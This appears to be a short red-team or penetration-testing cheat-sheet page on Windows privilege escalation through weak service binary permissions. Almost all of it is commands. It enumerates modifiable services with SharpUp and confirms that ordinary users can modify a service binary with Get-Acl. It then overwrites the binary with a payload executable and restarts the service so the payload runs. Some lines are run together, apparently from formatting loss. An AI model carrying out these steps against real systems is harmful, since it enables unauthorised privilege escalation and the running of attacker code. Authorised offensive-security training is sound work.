Weak Service Binary Permissions
Using SharpUp
SharpUp.exe audit ModifiableServiceBinaries
VulnService3Import-Module C:\Tools\Get-ServiceAcl.ps1
powershell Get-Acl -Path "C:\Program Files\Vulnerable Services\Service 3.exe" | fl
BUILTIN\Users Allow Modifydownload Service 3.exe
copy "tcp-local_x64.svc.exe" "Service 3.exe"sc stop VulnService3
upload C:\Payloads\Service 3.exe
sc start VulnService3Tooling
Last updated